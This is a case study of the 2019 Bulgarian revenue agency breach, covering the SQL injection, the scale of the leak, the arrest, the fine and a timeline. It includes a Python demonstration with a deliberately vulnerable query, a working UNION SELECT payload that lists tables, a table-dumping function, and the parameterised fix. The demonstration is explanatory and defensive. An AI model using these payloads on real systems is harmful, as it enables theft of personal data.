Bulgarian National Revenue Agency breach
A single SQL injection against a rarely-used VAT service let an attacker exfiltrate tax, income, health and pension records on more than 6 million people — almost the entire adult population of Bulgaria.
- Victim: National Revenue Agency (NAP)
- Loss: $2.9M (regulatory fine)
- Records exposed: 6.1M
- People affected: 6.1M
On 15 July 2019, an anonymous hacker emailed Bulgarian newsrooms a trove of data stolen from the National Revenue Agency (NAP), the country's tax authority. The leak — eventually confirmed to cover 6,074,140 data subjects — exposed records on almost the entire adult population of Bulgaria, making it the largest data breach in the country's history.
What happened
The intrusion began in June 2019, when the attacker found and exploited a SQL injection vulnerability in a rarely-used online service for VAT refunds. SQL injection occurs when user-supplied input is pasted into the text of a database query, so that quotes and keywords in the input are executed by the database as part of the command rather than treated as a value. That let the attacker run queries of their own choosing against NAP's back-end databases through an unauthenticated public endpoint, without needing any account or privileged access. Over an extended period the attacker pulled down dozens of database tables.
On 15 July the hacker emailed Bulgarian media with sample files and a message mocking the state of Bulgarian cybersecurity, claiming to hold more than 110 folders and around 21 gigabytes of data. About 11 GB in 57 folders circulated publicly. NAP confirmed the data's authenticity the next day.
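To make the mechanism concrete, the following is an added illustration (not code from NAP or from the page's sources) of the two steps described above: a lookup endpoint that concatenates the requested refund ID into its SQL, and an attacker who uses that endpoint first to list the database's tables and then to export one of them, three columns at a time, through the same form. The schema, table names and sample rows are constructed for this example and are assumptions, not NAP's real schema. The hardened variant beside it binds the input as a parameter, which is the fix that a routine code review would have asked for. It runs against an in-memory SQLite database, so the catalog table queried is `sqlite_master`; on other engines the equivalent is `information_schema.tables`.

```python
import sqlite3

# Constructed sample data standing in for a tax agency's back end.
# Table and column names are assumptions for this illustration only.
SAMPLE_SCHEMA = """
CREATE TABLE vat_refunds (refund_id TEXT, company TEXT, amount REAL);
CREATE TABLE taxpayers (national_id TEXT, full_name TEXT, annual_income REAL);
INSERT INTO vat_refunds VALUES ('R-1001', 'Acme Ltd', 1200.50);
INSERT INTO vat_refunds VALUES ('R-1002', 'Beta EOOD', 87.25);
INSERT INTO taxpayers VALUES ('0000000001', 'Sample Person A', 24000.0);
INSERT INTO taxpayers VALUES ('0000000002', 'Sample Person B', 31500.0);
"""


def build_db():
    """Create an in-memory SQLite database loaded with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SAMPLE_SCHEMA)
    return conn


def lookup_refund_vulnerable(conn, refund_id):
    """Vulnerable lookup: the caller's input is spliced into the SQL text,
    so a quote character ends the string literal and everything after it
    becomes part of the command the database executes."""
    sql = (
        "SELECT refund_id, company, amount FROM vat_refunds "
        f"WHERE refund_id = '{refund_id}'"
    )
    return conn.execute(sql).fetchall()


def lookup_refund_safe(conn, refund_id):
    """Hardened lookup: the input is bound as a query parameter. Whatever it
    contains, the database compares it as a single string value."""
    sql = "SELECT refund_id, company, amount FROM vat_refunds WHERE refund_id = ?"
    return conn.execute(sql, (refund_id,)).fetchall()


# Attacker step 1: close the string literal, UNION in a read of the catalog,
# and comment out the trailing quote. Three columns are selected because
# UNION requires the same column count as the original SELECT.
ENUMERATE_TABLES_PAYLOAD = (
    "x' UNION SELECT name, type, 0 FROM sqlite_master WHERE type = 'table' --"
)


def enumerate_tables_via_injection(conn):
    """Return the names of all tables, obtained only through the refund lookup."""
    rows = lookup_refund_vulnerable(conn, ENUMERATE_TABLES_PAYLOAD)
    return sorted(name for name, kind, _ in rows if kind == "table")


def dump_table_via_injection(conn, table, columns):
    """Attacker step 2: export any discovered table through the same endpoint.
    Column names beyond the first three are ignored; fewer are padded with a
    constant so the UNION column counts still match."""
    cols = (list(columns) + ["0", "0", "0"])[:3]
    payload = f"x' UNION SELECT {', '.join(cols)} FROM {table} --"
    return lookup_refund_vulnerable(conn, payload)


if __name__ == "__main__":
    db = build_db()
    print("legitimate lookup:", lookup_refund_safe(db, "R-1001"))
    print("tables seen by attacker:", enumerate_tables_via_injection(db))
    print("exfiltrated taxpayers:",
          dump_table_via_injection(db, "taxpayers",
                                   ["national_id", "full_name", "annual_income"]))
    # The same payload against the parameterised query matches no row.
    print("payload against safe lookup:",
          lookup_refund_safe(db, ENUMERATE_TABLES_PAYLOAD))
```

Two practical notes. The parameterised version is the real fix; escaping quotes by hand or relying on a web-application firewall to spot `UNION SELECT` only narrows the attacker's options. And because the catalog read in step 1 is the attacker's first move, the strings `sqlite_master` or `information_schema` appearing in a request parameter of a public form are a high-confidence detection signal in web server logs.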
Impact
- Leaked records included full names, national identity numbers, addresses, income and tax data, social-security and pension contributions, health-related payments, and a register of online-gambling users — spanning from 2007 to mid-2019.
- The CPDP's investigation found data on 6,074,140 people was compromised: roughly 4.1 million living Bulgarian and foreign citizens and 1.96 million deceased.
- In a country of about 7 million, this represented nearly every living adult.
Investigation and penalty
Bulgarian police arrested Kristian Boykov, a 20-year-old penetration tester employed by a local cybersecurity firm, the day after the leak. He denied involvement and was released within days; the prosecution's case never produced a conviction, and the true perpetrator remains officially unconfirmed.
The data-protection regulator CPDP fined NAP 5.1 million BGN (about EUR 2.6 million) on 29 August 2019 for failing to implement adequate technical and organisational safeguards — one of the largest GDPR penalties in the EU at the time. Bulgarian courts later upheld the fine.
Why it matters
The NAP breach is a textbook example of a single application-layer flaw cascading into a national-scale exposure. A web vulnerability that parameterised queries or a routine code review would have prevented instead surfaced the tax and identity records of an entire nation, and the fact that the affected service was rarely used meant it drew little scrutiny while still being reachable from the internet with full access to the central databases. It became the reference case in EU debates (including a formal European Parliament question) about whether member-state administrations holding mandatory citizen data were meeting their GDPR security obligations.
Timeline
- June 2019: An attacker exploits a SQL injection flaw in a rarely-used NAP online VAT-refund service and begins extracting database contents.
- 15 July 2019: An anonymous hacker emails Bulgarian media outlets, attaching samples and claiming the theft of data from servers of the Ministry of Finance.
- 16 July 2019: NAP confirms the authenticity of the leaked data; police arrest 20-year-old penetration tester Kristian Boykov.
- Days later: Boykov is released; charges are later downgraded and the case against him does not result in a conviction.
- 29 August 2019: The Commission for Personal Data Protection (CPDP) fines NAP 5.1 million BGN (about EUR 2.6 million) for inadequate security measures.
- The CPDP investigation concludes that personal data of 6,074,140 subjects was breached, including roughly 4.1 million living people and 1.96 million deceased.
- Later: Bulgarian courts uphold the 5.1 million BGN GDPR penalty against the agency.
Sources
- https://en.wikipedia.org/wiki/2019_Bulgarian_revenue_agency_hack
- https://thehackernews.com/2019/07/bulgaria-nra-data-breach.html
- https://www.wolftheiss.com/insights/bulgaria-fines-in-millions-for-personal-data-breaches/
- https://www.bta.bg/en/news/bulgaria/562392-district-court-upholds-bgn-5-million-fine-for-personal-data-leak-from-nra-system
- https://www.europarl.europa.eu/doceo/document/E-9-2019-002962_EN.html